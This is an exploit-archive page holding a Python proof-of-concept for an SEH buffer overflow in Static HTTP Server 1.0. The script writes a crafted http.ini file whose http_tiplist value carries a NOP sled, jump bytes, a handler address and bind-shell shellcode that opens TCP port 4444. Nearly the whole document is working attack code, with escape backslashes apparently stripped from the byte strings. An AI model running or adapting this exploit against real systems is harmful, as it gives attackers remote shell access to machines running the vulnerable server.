[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Static HTTP Server 1.0 - SEH Overflow
# Published : 2013-07-01
# Author :
# Previous Title : MediaCoder PMP Edition 0.8.17 (.m3u) - Buffer Overflow Exploit
# Next Title : aSc Timetables 2013 - Stack Buffer Overflow Vulnerability
#!/usr/bin/env python
import os
#
# Title************************Static HTTP Server SEH Overflow - HTTP Config - http_tiplist
# Discovered and Reported******June 2013
# Discovered/Exploited By******Jacob Holcomb/Gimppy, Security Analyst @ Independent Security Evaluators
# Exploit/Advisory*************http://infosec42.blogspot.com/
# Software*********************Static HTTP Server v1.0 (Listens on TCP/80)
# *****************************http://sourceforge.net/projects/static-httpd/?source=dlp
# Tested Platform*************Winodws XP SP2
# CVE**************************Static HTTP Server 1.0 - SEH Overflow: Pending
#
# Notes:
# Multiple HTTP commands and headers are vulnerable to overflows and trigger an exception, but
# I was unable to control the SEH handler with anyting but configuration options in the http.ini.
#
def fileCreate():
print "n[*] Your current file directory is %s. " % os.getcwd()
try:
File = "http.ini"
fileOpen = open(File, "w")
print "[*] Configuration file %s will be written to %s." % (File, os.getcwd())
except:
print "n[*] ERROR! There was an issue creating your file. Please make sure you have write access to %s!!!!!n" % os.getcwd
return fileOpen
def main():
NOP1 = "x90" * 1691
NOP2 = NOP1[0:349]
prev = "xEBxF6x90x90" #Short JMP -10 bytes
Handler = "x9Ex1Dx40x00"#00401D9E httpd.exe
jmp = "xe9x87xeexffxff"#FFFFEE87#"xe9xA3xfexffxff"
#344 Byte Bind Shell TCP/4444
shellcode = ("xdbxddxbax81x90xd3xb1xd9x74x24xf4x5bx2bxc9" +
"xb1x50x31x53x18x83xebxfcx03x53x95x72x26x4d" +
"xffx99x84x46x06xa2xe8x68x98xd6x7bxb3x7cx62" +
"xc6x87xf7x08xccx8fx06x1ex45x20x10x6bx05x9f" +
"x21x80xf3x54x15xddx05x85x64x21x9cxf5x02x61" +
"xebx02xcbxa8x19x0cx09xc7xd6x35xd9x3cx3fx3f" +
"x04xb7x60x9bxc7x23xf8x68xcbxf8x8ex30xcfxff" +
"x7bxcdxc3x74xf2xbex3fx97x64xfcx0ex7cx02x89" +
"x33xb2x40xcdxbfx39x26xd2x12xb6x87xe2x32xa1" +
"x89xbdxc4xddxc6xbex0ex7bxb4x26xc6xb7x08xcf" +
"x61xcbx5ex50xd9xd4x4fx06x2axc7x8cxecxfcxe7" +
"xbbx4cx75xf2x22xf2x68xf5xa8xa1x18x04x52x99" +
"xb4xd1xa5xefxe9xb5x4axd9xa2x6axe6xb5x17xce" +
"x5bx79xc4x2fx8bx1bx82xdex70x82x01x68x69xdf" +
"xcdxcex70x90xcax58x7ax86xbex76xd5x72xc1xa7" +
"xbdxd8x90x66xd7x76x15xa0x74x2cx16x9dx13x2b" +
"xa1x98xadxe4xcex73x7dx5fx64x29x81x8fx17xb9" +
"x9ax49xd1x43x32x55x0bxe6x43x79xd5x63xd8x1c" +
"x71x17x4dx68x64xbdxddx33x4fx8ex57x24xe5x4a" +
"xe1x49xc8x92x02x27xd4x51xc8xc6x6ax7ax81xba" +
"x10xbax0ex6fx4fxd2x22x8ex3cx35x3cx1bx06xc5" +
"x14xbfxd1x6bxc8x11x8cxe1xebxc0x7fxa3xbax1d" +
"xafx23x90x3bx4ax7axb9x44x82xe8xc1x44x1dx12" +
"xedx30x36x10x8dx83xdcx17x44x59xe3x38x01xae" +
"x91xbdx8dx1dx5ax6bxcex72")
sploit = NOP2 + shellcode + NOP1 + jmp + prev + Handler
File = fileCreate()
Config = ("""
# HTTP Daemon config file
# GarajCode programed by Savu Andrei
# This is the configuration file
# You can configure the maximum number
# of simultanious connections
max_http_connections = 256
# The port on which the server will listen
http_port = 80
# Multiple connections from same computer
http_mcsc = 1
# Banned ip list - separed by ;
http_ubip = 0
# http_biplist = ""
# Trusted ip list - separed by ;
http_utip = 0
# http_tiplist = "%s"
""") % sploit
File.write(Config)
File.close()
if __name__ == "__main__":
main()